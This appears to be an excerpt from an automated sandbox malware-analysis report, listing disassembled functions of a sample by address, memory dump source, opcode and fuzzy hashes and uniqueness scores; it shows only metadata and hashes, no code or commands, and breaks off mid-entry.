                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39f5ca0cf7e33db4f37774414214f68e54a7e3930b57748fda5466244e9afe2a
                                                    • Instruction ID: c122d707a938622481180600652a0173f1611ecb4570ebd3b47c3dfd53b0513b
                                                    • Opcode Fuzzy Hash: 39f5ca0cf7e33db4f37774414214f68e54a7e3930b57748fda5466244e9afe2a
                                                    • Instruction Fuzzy Hash: AB617DB1A087548FE314DF29D49476BBBE1BBC4304F048E2DE4D987391E77AD6088B92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00431A70 Relevance: .2, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39f5ca0cf7e33db4f37774414214f68e54a7e3930b57748fda5466244e9afe2a
                                                    • Instruction ID: a369b31026de7d88d67da642c2e939d0d342f4e0fa6f9390a4d81acb7b12d5f3
                                                    • Opcode Fuzzy Hash: 39f5ca0cf7e33db4f37774414214f68e54a7e3930b57748fda5466244e9afe2a
                                                    • Instruction Fuzzy Hash: 86616CB16087548FE314DF29D89475BBBE1BBC8318F044E2EE4D987351E379DA088B96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041F26BF Relevance: .2, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2ca06d4f824facefeae65e970364aab08c9e22c32d2739cd827ebf4d1da7f256
                                                    • Instruction ID: 787d2f044262c59cae3f380068b0da71c2b1864398ce0b398309ed54ae71d25f
                                                    • Opcode Fuzzy Hash: 2ca06d4f824facefeae65e970364aab08c9e22c32d2739cd827ebf4d1da7f256
                                                    • Instruction Fuzzy Hash: FC517A74200B018BC725CF28C8A1B62B3F1FF46314F548A9CD9978BBA1D776B846CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041E4557 Relevance: .1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c698c174aed0905b76bb9deb9b80976b298a303be8275c042e1677913b2c107d
                                                    • Instruction ID: c457bf6ccc6801e0c93e883336d8e06140454cafa0d56351b9300de19c2d30e8
                                                    • Opcode Fuzzy Hash: c698c174aed0905b76bb9deb9b80976b298a303be8275c042e1677913b2c107d
                                                    • Instruction Fuzzy Hash: BC4118BA908704DFD3219F55C8C477AB7E8EF9A314F094668D89947381E771F804CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004142F0 Relevance: .1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 81605b9ac1517a00ce4dea56618948cf99ff8f590b7bb2f04c29f3f4015aebb6
                                                    • Instruction ID: d5ab0e592ec9b0a7e5d1325dbbcb828f4771318c44f06cdbe13f499a28c875a0
                                                    • Opcode Fuzzy Hash: 81605b9ac1517a00ce4dea56618948cf99ff8f590b7bb2f04c29f3f4015aebb6
                                                    • Instruction Fuzzy Hash: 7A413CB1A083088BD3219F54D8807A7F7E8EFD5314F09452ADCA987381E779DD85C35A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041E5FE4 Relevance: .1, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9094f432fbc4fda00b6c1e4ab232e6fbd0d3de2aa2b8ace45c735c363ee2ca0
                                                    • Instruction ID: 4348d36b37b8aac703d64ecf2a23874c76c9090d306b375575497b32bd920d7d
                                                    • Opcode Fuzzy Hash: e9094f432fbc4fda00b6c1e4ab232e6fbd0d3de2aa2b8ace45c735c363ee2ca0
                                                    • Instruction Fuzzy Hash: 5441B2752043528FC729CF25C890BABB7F2FFD5314F84991CE5968B291EB34A805CB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041DF8F7 Relevance: .1, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8764e5a74b3df6e556d84926b47159690eb29a1b4afcf7fdd83b26137edd20cb
                                                    • Instruction ID: b924da37f4ebb6f9a7614c7df7f30336caa703e571a0dc3740b18ba19c72a968
                                                    • Opcode Fuzzy Hash: 8764e5a74b3df6e556d84926b47159690eb29a1b4afcf7fdd83b26137edd20cb
                                                    • Instruction Fuzzy Hash: EA4136B3A083641FC3189E79888022ABBD19FC5714F0A873DF4A987381E774DA05E791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040F690 Relevance: .1, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8764e5a74b3df6e556d84926b47159690eb29a1b4afcf7fdd83b26137edd20cb
                                                    • Instruction ID: 1f409bd494a2fe90a7ad212e61b5dac4767e0a876e272e83d39641c7261aa52a
                                                    • Opcode Fuzzy Hash: 8764e5a74b3df6e556d84926b47159690eb29a1b4afcf7fdd83b26137edd20cb
                                                    • Instruction Fuzzy Hash: B5412673A083644FC3189E798C8022ABBD19FC5314F0A873EF8A4973D1D679CD49A795
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00415D7D Relevance: .1, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 36789a714b9983b10bf018d989f7196b4ce825f9c28dea2af689609a5dc15436
                                                    • Instruction ID: 2a3b27cefb7fdadd9e30d5cb1766e1b53bc708d24ece9191ae1d0aaa84c0d201
                                                    • Opcode Fuzzy Hash: 36789a714b9983b10bf018d989f7196b4ce825f9c28dea2af689609a5dc15436
                                                    • Instruction Fuzzy Hash: 52418E355183428BC728CF24C861BABB7F2FFC6344F44991DE5968B291EB389945CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041E494D Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58df724565b95ad2619652c9850ccf87064b641c6c00871ef060174645d6a320
                                                    • Instruction ID: 261e4a039ad62175d1fe436891571659df06e8e913b7318df50eca619476944f
                                                    • Opcode Fuzzy Hash: 58df724565b95ad2619652c9850ccf87064b641c6c00871ef060174645d6a320
                                                    • Instruction Fuzzy Hash: 2E31F1B6900610CBC724CF19C892A76B3B1FF99364B1A856CE89B9B390F738F810C754
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04205A31 Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 088cdfc1dbe73986e7c06a892f373244c7a48e09d711284f2d21fe7b0bf71172
                                                    • Instruction ID: 0e26b86423c5dff4e2b490ab433d7151904547b0826622e3bfbbb7b73822460c
                                                    • Opcode Fuzzy Hash: 088cdfc1dbe73986e7c06a892f373244c7a48e09d711284f2d21fe7b0bf71172
                                                    • Instruction Fuzzy Hash: D5414674628342ABE308CF04C594B2EB7E6FB85708F18891CE0858B286D775F945DF9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004146E6 Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a4f19a1b3d542c7589ff1b76a353bdc670d9785429513248712ff20a4f3bf1d
                                                    • Instruction ID: 20cf5c03edef0ebffd69508bb2feb37119879bf2e0f9d30aa61f00552ce3be76
                                                    • Opcode Fuzzy Hash: 8a4f19a1b3d542c7589ff1b76a353bdc670d9785429513248712ff20a4f3bf1d
                                                    • Instruction Fuzzy Hash: F031C2B69002118BC7248F14C8525B3B3B1FFE6364B1A552EE8A69B3D0F73CE991C759
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D30D7 Relevance: .1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b81beb60adcaaf9e503189dc1868a7d2306701d3ae9cee04e1b6ecdd9333f26
                                                    • Instruction ID: 214583702aee13e033ff1ad21e47c118378fff2b574468970b6606a63cf73e27
                                                    • Opcode Fuzzy Hash: 7b81beb60adcaaf9e503189dc1868a7d2306701d3ae9cee04e1b6ecdd9333f26
                                                    • Instruction Fuzzy Hash: C62127767541A60BC7008E789CD42B677A2DFCA22671E52B9DFD0C7342C325E807C261
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402E70 Relevance: .1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b81beb60adcaaf9e503189dc1868a7d2306701d3ae9cee04e1b6ecdd9333f26
                                                    • Instruction ID: b9d5c178dd7a4c67f92386a8218285ca1ca60f72463a06f21cfd9b6585794e66
                                                    • Opcode Fuzzy Hash: 7b81beb60adcaaf9e503189dc1868a7d2306701d3ae9cee04e1b6ecdd9333f26
                                                    • Instruction Fuzzy Hash: 5921E7327541A207C740CE788DD82A777A2DFC622572E51BADBC0A7392C679DC079294
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041EFA8F Relevance: .1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a314761aca0b15bac0e499197e5654b3e3b027ff94c755a816ee124af95c710
                                                    • Instruction ID: 0454a319285824bd13d468e53ce25e11d63bf2e28dcbadc73fc8a46a7fc2f5c2
                                                    • Opcode Fuzzy Hash: 5a314761aca0b15bac0e499197e5654b3e3b027ff94c755a816ee124af95c710
                                                    • Instruction Fuzzy Hash: 41314939611B028FC324CF28C5D0AA6F3F2FF8A714765999DC8868B761DB71B852CB44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041F828 Relevance: .1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a314761aca0b15bac0e499197e5654b3e3b027ff94c755a816ee124af95c710
                                                    • Instruction ID: e7300225e8a177318780e90d9b68b89d612950984cb2efd66ae4e33f8a06940f
                                                    • Opcode Fuzzy Hash: 5a314761aca0b15bac0e499197e5654b3e3b027ff94c755a816ee124af95c710
                                                    • Instruction Fuzzy Hash: AA314835611B02CFC324CF28C580AA6B3F2FF8A714765956EC5868B761DB31B896CB48
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041EF8A7 Relevance: .1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73c16953a7693468cce625ce5520dbc63db12e11d5890ae801d714f42f0ac173
                                                    • Instruction ID: a941468ff4633825de6b8661c4dc41139b92557857e69672cff280a1b5d477dd
                                                    • Opcode Fuzzy Hash: 73c16953a7693468cce625ce5520dbc63db12e11d5890ae801d714f42f0ac173
                                                    • Instruction Fuzzy Hash: B8216DB9700B018BD724CF66C4D1662B3F2BF8A31470A899DD8D68BB55D734F946CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041F640 Relevance: .1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73c16953a7693468cce625ce5520dbc63db12e11d5890ae801d714f42f0ac173
                                                    • Instruction ID: 11437681611e05a0f7561572364b2723825494176b9a61f6ded9fb7c35aad996
                                                    • Opcode Fuzzy Hash: 73c16953a7693468cce625ce5520dbc63db12e11d5890ae801d714f42f0ac173
                                                    • Instruction Fuzzy Hash: 2B215CB5600B018BD724CF15C491663B3F2FF4A300759896ED8D68BB55D738E84ACB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04205C49 Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ecf9b6fc57c0365a65e17dac294f269cfe26d652c6cd93349b59fb0be8332a30
                                                    • Instruction ID: 2fa5e18fda4d60cd0ed0dd296274e819b73cad8cdc6abf17a1805f3712069210
                                                    • Opcode Fuzzy Hash: ecf9b6fc57c0365a65e17dac294f269cfe26d652c6cd93349b59fb0be8332a30
                                                    • Instruction Fuzzy Hash: 24214B74618342ABE310CF04C988B1BB7F6BBC1708F24891CE5949B2D6C7B5E845CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041F4F17 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 614f285c47a44a509acd1fb7f416737829ba53880da428a92352acdfcff60832
                                                    • Instruction ID: ff210e3fe3532b4c3edc2b72eda1a9cc829da8d962347471b1eda83ef55465a1
                                                    • Opcode Fuzzy Hash: 614f285c47a44a509acd1fb7f416737829ba53880da428a92352acdfcff60832
                                                    • Instruction Fuzzy Hash: 6C213774119B818BD76ACB24C8A47A3BBF2BF8730AF48559DC0D30BA86C775750ACB45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424CB0 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 614f285c47a44a509acd1fb7f416737829ba53880da428a92352acdfcff60832
                                                    • Instruction ID: 6f77e30a321d026a9acbd953c90a2d9133533e1004874743f08a9f15404b72cd
                                                    • Opcode Fuzzy Hash: 614f285c47a44a509acd1fb7f416737829ba53880da428a92352acdfcff60832
                                                    • Instruction Fuzzy Hash: A8216834219B918BD76ACB24D8A47A3BBE2FF87305F98558DC0D30BB86C7796406CB45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041FFAF7 Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                    • Instruction ID: 5b25da8a5f50a6fc751e230cecf6d524248e80c766d1101b7471b7439e825d47
                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                    • Instruction Fuzzy Hash: C7112933B141D40DC3168D3C88A05A4BFA30A93174F2D83DAF4B49B2D6D7239D8B8358
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042F890 Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                    • Instruction ID: b73ac011751cc30cde1660d2e37339d0245df53a3d7c422b31ac8128b6be4b8c
                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                    • Instruction Fuzzy Hash: 4411EC33B051E40EC3158D3C9400566BFB30AA3635FD943BAF4F8972D6D6268D8E9359
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041ED377 Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c0ab9d8e908ed14464d132a5d134827dfa759970a7a258c788b99254c2195891
                                                    • Instruction ID: 887792db74985886ded9b706cc0d00eb16878301a603ac7a6288fc8c13a85888
                                                    • Opcode Fuzzy Hash: c0ab9d8e908ed14464d132a5d134827dfa759970a7a258c788b99254c2195891
                                                    • Instruction Fuzzy Hash: 14113CB59183459BE310CF24D9C06BAF7E8FF9A344F08496CE8C993290E7B9E584C756
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 042654B3 Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Offset: 04265000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4265000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                    • Instruction ID: 441296fa5ed0d504f78c67fdd07c3bb3c71b614ad3173afac16f75cbf9a9e0ff
                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                    • Instruction Fuzzy Hash: 9A118E72350100AFD754DF55EC84FA673EAEB89360B2980A9ED09CB312E676F881C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041E1CAB Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb7a5bff1dbd84864c30aed502843d58e4c4bf03eb07ee31482e7b1e4368703c
                                                    • Instruction ID: b32a3c7ae929225709ae590222c410e754a786eb5ea078825f86bf157b9d88c1
                                                    • Opcode Fuzzy Hash: bb7a5bff1dbd84864c30aed502843d58e4c4bf03eb07ee31482e7b1e4368703c
                                                    • Instruction Fuzzy Hash: AD115871204B808BD328CF24C8A4BABBBF0BB02204F08485DC9D387A81C3BAF4498B45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00411A44 Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb7a5bff1dbd84864c30aed502843d58e4c4bf03eb07ee31482e7b1e4368703c
                                                    • Instruction ID: 348a8ba48f1a2f0327b4d46336ec4528d420831e24f9bfe180b1afd1f7eb374e
                                                    • Opcode Fuzzy Hash: bb7a5bff1dbd84864c30aed502843d58e4c4bf03eb07ee31482e7b1e4368703c
                                                    • Instruction Fuzzy Hash: 60113D71605B808BD329CF24C8A4BABBBF0FB02344F44491ED5D797A92D3BAF4498B45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041F1F2E Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
                                                    • Instruction ID: 4bee8a8c3048ba02a9597fe8f410917b32f814afa0efa4b7809803484cd1e96c
                                                    • Opcode Fuzzy Hash: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
                                                    • Instruction Fuzzy Hash: 761139B0508341AFD304CF14C8A4B1BBBE1BB8A318F048A2DF8D49B240C778D9068B86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00421CC7 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
                                                    • Instruction ID: e6a21cfd48ccecce0c7a3d54777b2644280168018e78a496dfdad913fb49de2b
                                                    • Opcode Fuzzy Hash: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
